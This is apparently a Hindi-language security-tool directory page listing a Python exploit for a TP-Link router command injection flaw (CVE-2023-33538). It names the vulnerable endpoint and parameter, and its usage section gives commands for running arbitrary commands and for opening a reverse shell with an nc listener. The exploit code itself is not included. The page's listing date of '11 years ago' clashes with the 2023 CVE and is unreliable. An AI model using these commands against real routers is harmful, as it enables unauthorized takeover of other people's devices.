Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-33538 — TP-Link TL-WR940N/TL-WR841N Command Injection Vulnerability के लिए Python Exploit | Kitploit
उपकरण/GitHubGitHub/explxx/cve-2023-33538
IoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवायरलेस सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHubexplxx/cve-2023-33538

CVE-2023-33538

TP-Link TL-WR940N/TL-WR841N Command Injection Vulnerability के लिए Python Exploit

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

TP-Link TL-WR940N/TL-WR841N कमांड इंजेक्शन कमजोरी के लिए Python Exploit

उपयोग निर्देश

  1. बुनियादी कमजोरी जांच:

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
    
  2. कस्टम कमांड निष्पादित करें:

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
    
  3. रिवर्स शेल (पहले nc -lvnp 4444 से लिस्टनर सेट करें):

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
    

महत्वपूर्ण नोट्स:

  • ये स्क्रिप्ट केवल शैक्षिक और परीक्षण उद्देश्यों के लिए हैं
  • किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित अधिकार प्राप्त करें
  • रीबूट कमांड को डिफ़ॉल्ट के रूप में उपयोग किया जाता है क्योंकि यह गैर-विनाशकारी और आसानी से सत्यापित करने योग्य है
  • रिवर्स शेल सभी फर्मवेयर संस्करणों पर काम नहीं कर सकता क्योंकि यह उपलब्ध बाइनरी पर निर्भर करता है
  • कुछ फर्मवेयर संस्करणों में URL में एक यादृच्छिक पथ की आवश्यकता होती है जिसे स्क्रिप्ट स्वचालित रूप से पहचानने का प्रयास करती है

यह कमजोरी /userRpm/WlanNetworkRpm.htm एंडपॉइंट के ssid1 पैरामीटर में अनुचित इनपुट स्वच्छता के कारण मौजूद है, जो विशेष रूप से तैयार किए गए अनुरोधों के माध्यम से कमांड इंजेक्शन की अनुमति देती है।

टूल डाउनलोड करें